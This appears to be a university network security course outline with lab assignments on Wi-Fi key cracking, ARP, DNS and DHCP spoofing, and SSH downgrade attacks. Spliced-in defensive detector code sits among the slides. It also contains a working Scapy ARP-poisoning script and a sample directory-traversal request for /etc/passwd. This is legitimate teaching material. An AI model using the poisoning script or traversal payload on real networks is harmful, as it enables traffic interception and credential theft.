ties327 network security (3-5 ects) - jyväskylän...

Post on 21-Mar-2018

UNIVERSITY OF JYVÄSKYLÄ

TIES327 – Network Security (3-5 ECTS)

Prof. Timo Hämäläinen [email protected]

Department of Mathematical Information Technology

IT Faculty

University of Jyväskylä

Important note!

If you have completed the "old course" TIES326 in 2012 or 2013, you will not get credits from this TIES327, as its content has more than 50% of the same assignments as TIES326 had in 2012 and 2013. Those students who completed TIES326 before 2012 have the possibility to get credits from TIES327.

Goals of the course

Students understand what the term "security" means, in particular from the networks and services point of view
... get familiar with the different security aspects and understand the necessary terms
... are capable of applying the various tools in auditing and protecting against network attacks
... learn to look for new knowledge about this area

A feeling of safety must not come from ignorance!

The course focuses on hands-on work with security issues and learning by doing different network security exercises.

Remember: Use of the presented methods is illegal in public networks!!

Prerequisites

• Basic knowledge about networks, TCP/IP protocols and programming
• For example the following courses (or similar knowledge):
  • ITKP101 - Tietokone ja tietoverkot työvälineenä
  • ITKP104 - Tietoverkot
  • ITKP102 - Ohjelmointi 1

How to complete the course?

• Complete the assignments
• Groups of 1-3 students
• You should get at least 50% of the total points and at least 50% of the points of each assignment.
  • 3 ECTS: complete assignments 1-9
  • 4 ECTS: complete assignments 1-11
  • 5 ECTS: complete all 13 assignments
• Different network attack configurations, tools for protecting and analysing networks
  • MITM, WLAN cracking, VPN, Firewall, IDS etc.
  • pfSense: http://www.pfsense.org/
  • Snort: http://www.snort.org/
  • Radamsa: http://code.google.com/p/ouspg/wiki/Radamsa
  • Wireshark: http://www.wireshark.org/
  • Scapy: http://secdev.org/projects/scapy/
  • Kali Linux: http://www.kali.org/
• Exam (not obligatory; for upgrading the grade, max. 15 points)

About the assignments

1. Virtual network configuration

• In this first assignment, you will create and configure a virtual network which will be used for testing different kinds of network attacks.
• To do this you need a PC with 2 GB of RAM (more is of course better!).
• We have used Ubuntu, but it is of course possible to make the same virtual network configuration on Windows or Mac OS by using the corresponding commands.
• https://www.virtualbox.org/

2. Security in social media / student presentations (lecture 3)

Groups of 1-4 students will make a presentation. The topic is security in social media (duration of the presentation 20-25 min).

The presentation should cover the following aspects. Even better if you can create your own live demo, like e.g. http://www.youtube.com/watch?v=-H1qjiwQldw:

1. What kinds of threats/attacks exist in social media?
  • Social engineering, phishing, spam, code injection, XSS, CSRF/XSRF, DDoS etc.
2. How can you protect against these threats?
3. Possibilities and drawbacks of Web technologies
  • Asynchronous JavaScript And XML (AJAX), Cascading Style Sheets (CSS), Flash, JSON and XML etc.

All groups will return a www link (no attachment!) to their presentation by 9.11 at 23:59 to: [email protected].

At the beginning of the lecture we will randomly select four groups to give their presentations.

About the assignments

3. WEP Cracking

• In this assignment you are going to crack a WEP key with the tools available at: http://aircrack-ng.org/
• It is intended to build your basic skills and get you familiar with wireless network security concepts.
• It assumes you have a working wireless card with drivers already patched for injection.
• The basic concept behind this work is using aireplay-ng, which replays an ARP packet to generate new unique IVs.
• In turn, aircrack-ng uses the new unique IVs to crack the WEP key.
• It is important to understand what an ARP packet is (http://tools.ietf.org/html/rfc826).

4. WPA Cracking

• This assignment walks you through cracking WPA/WPA2 networks which use pre-shared keys.
• We recommend you do some background reading to better understand what WPA/WPA2 is.
• WPA/WPA2 supports many types of authentication beyond pre-shared keys. aircrack-ng can ONLY crack pre-shared keys.
• So make sure airodump-ng shows the network as having the authentication type PSK; otherwise, don't bother trying to crack it.
• There is another important difference between cracking WPA/WPA2 and WEP: the approach used to crack the WPA/WPA2 pre-shared key.
• Unlike WEP, where statistical methods can be used to speed up the cracking process, only plain brute-force techniques can be used against WPA/WPA2.
• That is because the key is not static, so collecting IVs as when cracking WEP encryption does not speed up the attack.
• The only thing that gives the information needed to start an attack is the handshake between client and AP.
• Handshaking is done when the client connects to the network.
• Although not absolutely true, for the purposes of this assignment, consider it true.
• Since the pre-shared key can be from 8 to 63 characters in length, it effectively becomes impossible to crack the pre-shared key.
• The only time you can crack the pre-shared key is if it is a dictionary word or relatively short in length.

5. ARP Poisoning

• In this assignment you are going to perform two Man-In-The-Middle (MITM) attacks: poisoning ARP tables and redirecting ICMP traffic.
• ARP poisoning is also known as ARP spoofing, ARP flooding and ARP poison routing.
• So what basically is ARP poisoning?
• It is a technique which allows an attacker to sniff traffic from the LAN, monitor it and even stop it.
• ARP poisoning is done by sending fake or spoofed ARP messages onto an Ethernet LAN.
• By doing so the attacker manages to associate its own MAC address with the IP address of another node on the network (which is basically the default gateway IP).
• Then the traffic meant for the gateway first goes to the attacker and then to the gateway, thus allowing the attacker to sniff traffic from the network.
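The defender's view of the attack described above, as an added example (not course material): a passive detector that watches decoded ARP packets and flags the two symptoms of poisoning, an IP whose sender MAC suddenly changes and an "is-at" reply nobody asked for. The packets are assumed to be already decoded into dicts using Scapy's ARP field names (op, psrc, hwsrc, pdst, hwdst) and are constructed inline, so the script runs offline.

```python
"""Passive ARP-spoofing detector over a stream of decoded ARP packets."""


def detect_arp_spoofing(packets, trusted=None):
    """Return a list of alert strings for a chronological packet list.

    packets: iterable of dicts with keys op (1 = who-has, 2 = is-at),
             psrc, hwsrc, pdst, hwdst (Scapy ARP field names assumed).
    trusted: optional dict IP -> MAC of known-good hosts, e.g. the gateway.
    Flagged:
      * an IP whose sender MAC differs from the one learnt or trusted earlier
      * an is-at reply for an IP that no preceding who-has asked about
    """
    cache = dict(trusted or {})   # IP -> MAC learnt so far
    pending = set()               # IPs with an outstanding who-has
    alerts = []
    for i, p in enumerate(packets):
        ip, mac = p["psrc"], p["hwsrc"].lower()
        if p["op"] == 1:                              # who-has
            pending.add(p["pdst"])
        elif p["op"] == 2:                            # is-at
            if ip not in pending:
                alerts.append("#%d unsolicited reply: %s is-at %s" % (i, ip, mac))
            pending.discard(ip)
        known = cache.get(ip)
        if known is not None and known != mac:
            alerts.append("#%d MAC change for %s: %s -> %s" % (i, ip, known, mac))
            continue                                  # keep the first mapping
        cache[ip] = mac
    return alerts


# Constructed capture: the gateway 192.168.72.2 legitimately answers the
# victim's request, then a second host starts claiming the gateway's IP
# (first with a spoofed who-has, then with a spoofed is-at).
SAMPLE = [
    {"op": 1, "psrc": "192.168.72.128", "hwsrc": "08:00:27:aa:aa:aa",
     "pdst": "192.168.72.2", "hwdst": "00:00:00:00:00:00"},
    {"op": 2, "psrc": "192.168.72.2", "hwsrc": "00:50:56:ee:ee:ee",
     "pdst": "192.168.72.128", "hwdst": "08:00:27:aa:aa:aa"},
    {"op": 1, "psrc": "192.168.72.2", "hwsrc": "08:00:27:bb:bb:bb",
     "pdst": "192.168.72.128", "hwdst": "00:00:00:00:00:00"},
    {"op": 2, "psrc": "192.168.72.2", "hwsrc": "08:00:27:bb:bb:bb",
     "pdst": "192.168.72.128", "hwdst": "08:00:27:aa:aa:aa"},
]

if __name__ == "__main__":
    for line in detect_arp_spoofing(SAMPLE):
        print(line)
```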

5. ICMP Redirection

• ICMP (Internet Control Message Protocol) is used to send error messages, report problems and for routing purposes.
• When the router sends a route redirection to the client indicating a shorter route to some particular destination, a host-route entry is added to the client's routing table.
• The attacker can change the client's routing table so that traffic from the client to a web server is redirected to the attacker.
• For this purpose the attacker sends an ICMP redirect message to the client in which the source IP is the gateway, the source IP for redirection is the client, the destination IP for redirection is the web server and the gateway is the attacker.
• After the client updates its routing table with the web server's IP address and the attacker's IP address, all traffic from the client to the web server is redirected to the attacker.

6. DNS spoofing

• In this exercise you are going to perform two Man-In-The-Middle (MITM) attacks: spoofing DNS and DHCP servers.
• The Domain Name System translates names that humans can understand into IP addresses.
• First, the client sends a DNS query and the DNS server responds with a DNS response.
• The DNS query and response have an identical ID number and query.
• Then the client updates its DNS cache entries accordingly with the domain name and IP address.
• Assume that the attacker wants to change the client's DNS cache so that traffic from the client to the domain web.seclab.jyu.fi is redirected to the attacker's server 192.168.1.102.
• For this purpose the attacker sniffs DNS queries from the client and waits for a DNS query with the relevant query name, then spoofs a DNS response, e.g. with the attacker's IP.
• The client updates its DNS cache and therefore all traffic goes to the attacker. The attacker keeps spoofing DNS responses to keep its entry in the cache.
• However, the DNS query eventually arrives at the DNS server and the server will respond with a legitimate DNS response.
• When the client gets the legitimate response, it will update its cache.
• For this reason, ARP poisoning of the client should be done before DNS spoofing. In this section, we show how to spoof the DNS server.
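The race between the forged and the legitimate response described above is also what a monitor can look for. The following added example (not course material) correlates DNS responses with outstanding queries by (transaction ID, query name) and flags a response that matches no query as well as a second, conflicting answer to the same query. Packets are assumed to be already decoded (the fields a Scapy DNS layer exposes) and are constructed inline.

```python
"""Correlate DNS responses with outstanding queries to spot spoofed answers."""


def detect_dns_spoofing(packets):
    """Return alert strings for a chronological list of decoded DNS packets.

    Each packet is a dict with qr (0 = query, 1 = response), id
    (transaction ID), qname, and for responses rdata (the answer address).
    Two situations are flagged:
      * a response whose (id, qname) pair matches no outstanding query,
      * a second response to the same query carrying a different answer,
        which is exactly the race between a forged reply and the real one.
    """
    outstanding = {}   # (id, qname) -> None until answered, then first rdata
    alerts = []
    for i, p in enumerate(packets):
        key = (p["id"], p["qname"].rstrip(".").lower())
        if p["qr"] == 0:
            outstanding[key] = None
            continue
        if key not in outstanding:
            alerts.append("#%d response %s for %s matches no query"
                          % (i, p["rdata"], key[1]))
            continue
        first = outstanding[key]
        if first is None:
            outstanding[key] = p["rdata"]
        elif first != p["rdata"]:
            alerts.append("#%d conflicting answers for %s (id 0x%04x): %s then %s"
                          % (i, key[1], key[0], first, p["rdata"]))
    return alerts


# Constructed capture: the client resolves web.seclab.jyu.fi, a forged
# answer pointing at 192.168.1.102 arrives first, and the legitimate
# resolver's answer (192.0.2.10, a documentation address) comes later.
# The last packet is an answer for a name that was never asked about.
SAMPLE = [
    {"qr": 0, "id": 0x1a2b, "qname": "web.seclab.jyu.fi."},
    {"qr": 1, "id": 0x1a2b, "qname": "web.seclab.jyu.fi.", "rdata": "192.168.1.102"},
    {"qr": 1, "id": 0x1a2b, "qname": "web.seclab.jyu.fi.", "rdata": "192.0.2.10"},
    {"qr": 1, "id": 0x0042, "qname": "example.com.", "rdata": "203.0.113.7"},
]

if __name__ == "__main__":
    for alert in detect_dns_spoofing(SAMPLE):
        print(alert)
```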

6. DHCP spoofing

• DHCP (Dynamic Host Configuration Protocol) is used to configure network settings on hosts in IP networks.
• DHCP allows hosts to be dynamically configured with an IP address, subnet mask, gateway address and DNS server address.
• It works as follows: first, the client sends (broadcasts) a DHCP discover containing a transaction ID.
• The DHCP server responds with a DHCP offer which contains the same transaction ID.
• The client then sends a DHCP request and the DHCP server responds with a DHCP ack.
• When applying a DHCP spoofing attack, the attacker waits for a DHCP discover request from the client.
• After getting this request the attacker spoofs a DHCP offer assigning a malicious gateway and/or DNS server.
• After that the client responds with a DHCP request and the attacker spoofs a DHCP ack as well.
• Finally, the client updates its DNS server and gateway addresses.
• However, when the DHCP discover arrives at the DHCP server, this server responds to the client with a legitimate DHCP offer.
• If the client gets the legitimate offer first, then DHCP spoofing will not work.
• For this reason, the attacker DoSes the DHCP server during the attack so that the DHCP server cannot respond to clients.
• In this section, we show how to spoof the DHCP server.

7. Annoying HTTP server and bank attack

• This assignment deals with two Man-In-The-Middle (MITM) attacks: an annoying HTTP server and a bank attack.
• Once an attacker is located in the middle between his victim and other network nodes, he can easily change HTTP requests and responses which go through him.
• In this section, the attacker changes web pages which the victim requested from a web site to make the victim feel nervous.
• For this attack, the attacker first poisons the ARP cache of the victim in order to be "in the middle".
• Then, when the victim requests a web page, he modifies all pictures contained on the page and sends the result to the victim.

Bank attack

• In this section, we use the case where the attacker places himself "in the middle" and then steals money from the victim's bank account when the victim logs in to the system.
• Despite the fact that the cryptographic protocol SSL is used by the bank web site, the attacker is still able to transfer the victim's money to another bank account.

8. SSH downgrading

• Secure Shell (SSH) is a cryptographic network protocol for secure data communication, remote shell services or command execution and other secure network services between two networked computers that it connects via a secure channel over an insecure network.
• The protocol specification distinguishes two major versions that are referred to as SSH-1 and SSH-2.
• Here we consider the most famous example of a downgrade attack, where the attacker forces the client and the server to use the insecure SSH-1 protocol.
• The client sends a request to establish an SSH link to the server and asks it for the versions it supports. The server answers with one of:
  - ssh-2.xx, i.e. the server supports only SSH-2,
  - ssh-1.99, i.e. the server supports SSH-1 and SSH-2,
  - ssh-1.51, i.e. the server supports only SSH-1.
• In our example, the server is configured to support both SSH-1 and SSH-2, and the client is set to use SSH-2 and SSH-1 with SSH-2 as the preference.
• In this case the hacker, if he is already located in the middle (e.g. after applying ARP poisoning), changes the answer by modifying the "1.99" string to "1.51" to indicate to the client that the server supports only SSH-1, and thus forces the client to open an SSH-1 link.
• The client, who thinks it is using the secure SSH-2 protocol, will log in with SSH-1 and the password will be immediately captured by the hacker because of the weak SSH-1 password authentication mechanism.
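The downgrade works only because the client in the example is willing to fall back to SSH-1. The following added example (not course material) parses the server's identification string in the format given by RFC 4253 section 4.2 (SSH-protoversion-softwareversion SP comments CR LF) and applies the client policy that defeats the tampering: "2.0" and "1.99" continue with SSH-2, while a "1.51" banner is refused unless SSH-1 is explicitly allowed. Function names and the sample banners are this example's own; current OpenSSH releases no longer implement SSH-1 at all, which is the same policy built in.

```python
"""Validate an SSH identification string before the key exchange continues."""
import re

# protoversion and softwareversion may not contain whitespace or '-' (RFC 4253)
BANNER_RE = re.compile(
    r"^SSH-(?P<proto>[0-9]+\.[0-9]+)-(?P<soft>[^\s-]+)(?: (?P<comment>.*))?$")


def parse_ssh_banner(line):
    """Return (protoversion, softwareversion, comments) or raise ValueError.

    RFC 4253 limits the identification line to 255 bytes including CR LF.
    """
    line = line.rstrip("\r\n")
    if len(line) > 253:
        raise ValueError("identification string too long")
    m = BANNER_RE.match(line)
    if m is None:
        raise ValueError("malformed identification string: %r" % line)
    return m.group("proto"), m.group("soft"), m.group("comment") or ""


def accept_server_banner(line, allow_ssh1=False):
    """Client policy decision: returns (ok, reason).

    '2.0'  -> SSH-2 only: continue.
    '1.99' -> server speaks both; an SSH-2 client treats it as '2.0'.
    '1.x'  -> SSH-1 only: continue only if the policy explicitly allows SSH-1,
              so a banner tampered to '1.51' is rejected by default.
    """
    try:
        proto, soft, _ = parse_ssh_banner(line)
    except ValueError as err:
        return False, str(err)
    if proto in ("2.0", "1.99"):
        return True, "continue with SSH-2 (%s)" % soft
    if proto.startswith("1.") and allow_ssh1:
        return True, "SSH-1 permitted by policy (%s)" % soft
    return False, "server offers only SSH-%s; refusing downgrade" % proto


if __name__ == "__main__":
    # Constructed banners: the genuine answer from the assignment's server,
    # the same answer after in-the-middle tampering, and an SSH-2-only server.
    for banner in ("SSH-1.99-OpenSSH_5.3\r\n",
                   "SSH-1.51-OpenSSH_5.3\r\n",
                   "SSH-2.0-OpenSSH_8.9 sample-comment\r\n"):
        print(banner.strip(), "->", accept_server_banner(banner))
```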

9. Reverse TCP attack

• Man-In-The-Middle attacks can be combined with such dangerous attacks as a reverse TCP connection.
• A firewall usually blocks open ports but does not block outgoing traffic; therefore a reverse connection is used to bypass firewall and router security restrictions.
• For example, a Trojan horse running on a computer behind a firewall that blocks incoming connections can easily open an outbound connection to a remote host on the Internet.
• Once the connection is established, the remote host can send commands to the Trojan horse.
• Trojan horses that use a reverse connection usually send SYN (TCP) packets to the attacker's IP address.
• The attacker listens for these SYN packets and accepts the desired connections.

10. Configuring a VPN connection with the help of OpenVPN

• In this assignment you configure an OpenVPN server and client, set up your own Certificate Authority (CA), generate keys and sign certificates.
• In addition, it describes two-factor authentication based on a username and password, which are used by the server for authenticating a connecting client.
• OpenVPN is a full-featured SSL VPN which implements secure network extension using the industry-standard SSL/TLS protocol, supports flexible client authentication methods based on certificates, smart cards, and/or username/password credentials, and allows user- or group-specific access control policies using firewall rules applied to the VPN virtual interface.

11. Public-key cryptography with GNU Privacy Guard

• Public-key cryptography allows you to communicate with someone securely without exchanging a secret password first. With public-key encryption, instead of sharing a password, each party generates a "keypair" consisting of a "public" key and a "secret/private" key.
• Each party can then publish their "public" key to the world or send it directly to the other party, while keeping their secret key private and safe. If you have a person's public key, you can do a few things with it:
  • Encrypt a message that only that person can decrypt (they need their secret key to decrypt it).
  • Validate that the person signed a message with their secret key. This also lets you verify strongly that the message was not corrupted or modified in transmission.
• With your secret key, you can do the following things:
  • Decrypt messages encrypted with your public key.
  • Sign messages that others can verify came from you (they need your public key to verify the signature).
• This assignment explains how to configure and use a Public Key Infrastructure (PKI), encrypt files and sign emails by using GNU Privacy Guard (GPG).
• The GNU Privacy Guard is the GNU project's complete and free implementation of the OpenPGP standard as defined by RFC 4880. GPG allows you to encrypt and sign your data and communication, and features a versatile key management system as well as access modules for all kinds of public key directories.

12. Configuration of Snort and pfSense

• In this assignment you are going to install, configure and tune Snort and pfSense for protecting your network.
• Snort is a free and open source network intrusion prevention system and network intrusion detection system (signature based).
• pfSense is an open source firewall/router software distribution based on FreeBSD.

13. Network traffic anomaly detection

• In this assignment, an HTTP access log file is preprocessed into a numerical matrix, anomalous queries are found using dimensionality reduction and clustering, and finally the anomalous log lines are analyzed.
• In this exercise, it is assumed that some kind of Linux distribution is used (running in VirtualBox etc. is fine).
• A Windows installation might be possible, but it is much easier on Linux.
• In the following examples, the Octave software is used.
• In addition, we need the package octave-statistics.
• If available, Matlab uses the same syntax.
• Python is also used, because the character distribution file will be generated with it from the Apache log file.
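The preprocessing step of this assignment, as an added example that is not the course's own script: each request URI from an Apache access log is turned into a character-distribution row (relative frequency of every printable ASCII character), which is the numerical matrix the text refers to. The course then hands that matrix to Octave for dimensionality reduction and clustering; here a simpler distance-from-mean score with a median-based cut-off stands in for that step so the whole thing runs in pure Python. The log lines are constructed.

```python
"""Character-distribution features and outlier scoring for an Apache access log."""
import math
import re
from urllib.parse import unquote

# Apache common/combined log format: host ident user [time] "method uri proto" status size
LOG_RE = re.compile(r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<uri>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)')


def char_distribution(text):
    """95-element relative frequency vector over printable ASCII (0x20-0x7e)."""
    counts = [0] * 95
    for ch in text:
        if 0x20 <= ord(ch) <= 0x7e:
            counts[ord(ch) - 0x20] += 1
    total = sum(counts) or 1
    return [c / total for c in counts]


def parse_access_log(lines):
    """Yield (client, percent-decoded URI) for every parsable log line."""
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            yield m.group("host"), unquote(m.group("uri"))


def anomaly_scores(vectors):
    """Euclidean distance of every row from the column-wise mean of the matrix."""
    n = len(vectors)
    mean = [sum(col) / n for col in zip(*vectors)]
    return [math.sqrt(sum((x - m) ** 2 for x, m in zip(v, mean))) for v in vectors]


def find_anomalies(lines, ratio=2.0):
    """Return (uri, score) for requests scoring more than `ratio` times the median.

    A median-based cut-off is used because on a small log a single strong
    outlier inflates the mean and standard deviation of the scores themselves.
    """
    rows = list(parse_access_log(lines))
    scores = anomaly_scores([char_distribution(uri) for _, uri in rows])
    median = sorted(scores)[len(scores) // 2]
    return [(rows[i][1], s) for i, s in enumerate(scores) if s > ratio * median]


# Constructed access log: routine catalogue browsing plus one percent-encoded
# directory-traversal request, the kind of line the assignment wants surfaced.
SAMPLE_LOG = [
    '10.0.0.%d - - [21/Mar/2018:10:0%d:00 +0200] "GET %s HTTP/1.1" 200 5123'
    % (i + 1, i, uri) for i, uri in enumerate([
        "/shop/catalog.php?category=books&page=1",
        "/shop/catalog.php?category=books&page=2",
        "/shop/catalog.php?category=music&page=1",
        "/shop/catalog.php?category=games&page=3",
        "/shop/catalog.php?category=books&page=3",
        "/shop/catalog.php?category=music&page=2",
        "/shop/catalog.php?category=games&page=1",
        "/shop/catalog.php?category=" + "..%2F" * 8 + "etc%2Fpasswd&page=1",
    ])
]

if __name__ == "__main__":
    for uri, score in find_anomalies(SAMPLE_LOG):
        print("%.3f  %s" % (score, uri))
```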

Tools used in assignments

Kali Linux http://www.kali.org/

From the creators of BackTrack comes Kali Linux, the most advanced and versatile penetration testing distribution ever created. BackTrack has grown far beyond its humble roots as a live CD and has now become a full-fledged operating system.

Some tools used in assignments

Python https://www.python.org/

Scapy http://secdev.org/projects/scapy/

Scapy is a powerful interactive packet manipulation program. It is able to forge or decode packets of a wide number of protocols, send them on the wire, capture them, match requests and replies, and much more.

It can easily handle most classical tasks like scanning, tracerouting, probing, unit tests, attacks or network discovery (it can replace hping, 85% of nmap, arpspoof, arp-sk, arping, tcpdump, tethereal, p0f, etc.).

It also performs very well at a lot of other specific tasks that most other tools can't handle, like sending invalid frames, injecting your own 802.11 frames, combining techniques (VLAN hopping + ARP cache poisoning, VOIP decoding on a WEP encrypted channel, ...), etc.

An example: ARP poisoning (Python)

    from scapy.all import ARP, send
    from time import sleep
    import threading
    import os, sys


    class SpoofThread(threading.Thread):
        """One thread per target: keeps re-sending the same forged ARP packet."""

        def __init__(self, victim, gateway):
            threading.Thread.__init__(self)
            self.packet = ARP()              # default op is who-has; the sender
            self.packet.psrc = gateway       # mapping (gateway IP -> our MAC)
            self.packet.pdst = victim        # is what the victim caches

        def run(self):
            counter = 0
            print("spoofing " + str(self.packet.pdst) + " every 5 seconds...")
            try:
                while True:
                    send(self.packet, verbose=0)
                    counter += 1
                    print("poison #" + str(counter))
                    sleep(5)
            except Exception as e:
                print(type(e))
                print(e.args)
                print(e)


    if __name__ == "__main__":
        if len(sys.argv) != 3:
            sys.exit("Usage: %s <victim(s) IP(s)> <spoofed source IP>\n"
                     "example: python ArpSpoofing.py 192.168.72.128 192.168.72.2"
                     % os.path.basename(__file__))
        targets_dest_ips = [sys.argv[1]]
        spoofed_src_ip = sys.argv[2]
        for ip in targets_dest_ips:
            SpoofThread(ip, spoofed_src_ip).start()

Course grading

Total points   Grade
55             5
50             4
45             3
40             2
30             1

Work load

Ca. 150 hours, consisting of lectures (ca. 20 hours) and assignments (x hours, depending of course on your background skills).

About the lectures

The lectures are intended to provide an introduction to various network security topics and examples.

The course focuses on hands-on work with security issues and learning by doing (not learning by listening!).

Some literature:

• Lots of research papers
  - IEEE Xplore, http://ieeexplore.ieee.org/Xplore/dynhome.jsp
  - ACM, http://portal.acm.org/dl.cfm
  - Google Scholar, http://scholar.google.com/
  - http://site.ebrary.com/lib/jyvaskyla
• Introduction to Network Security
• Hacking Exposed Web 2.0: Web 2.0 Security Secrets and Solutions
• CEH: Certified Ethical Hacker Study Guide

L1: Introduction to network security

What is security and what are the goals
Threats to networks and IT systems
Security policies
Risk calculation
Security offenses
Social Engineering
Phishing
Legislation

L2: Recent network security threats/malware (visiting lecture by Matti Kannela)

Trojan horses
Rootkits
Spyware
Worms
Viruses
Adware
Backdoors
Ransomware
Etc.

L3: Security in social media (student presentations)

Assignment no. 2 (the assignment description is given above)


L4: Security for 4G Cellular Networks (visiting lecture by Zheng Chang)

Cellular network security issues (PHY/MAC layers)

SECURITY THREATS
User Identity
Femtocells
Interoperability
RRC signalling
Other threats

Being an all-IP network makes the system vulnerable to IP attacks, such as Denial of Service (DoS) over the public IP addresses of the core network interfaces, traffic eavesdropping and injection attacks.

L5: Modelling attacks (visiting lecture by Simo Huopio, Finnish Defence Forces)

Modelling and analysing attacks against networks and services
DDoS (Distributed Denial of Service)
Zero-Day attacks
APT (Advanced Persistent Threat)
Fuzzing / testing programs for vulnerabilities

L6: Protecting your networked services (visiting lecture by Tapio Väärämäki, Exclusive Networks Finland)

CARM - Cyber Attack Remediation and Mitigation
UTM (Unified Threat Management)
NGFW (Next Generation Firewall)
WAF (Web Application Firewall)
Database Security
File Security
Endpoint Security

L7: Monitoring and analysing the network data

Normal network behaviour
Anomaly detection
How to gather data
Pre-processing and analysing the data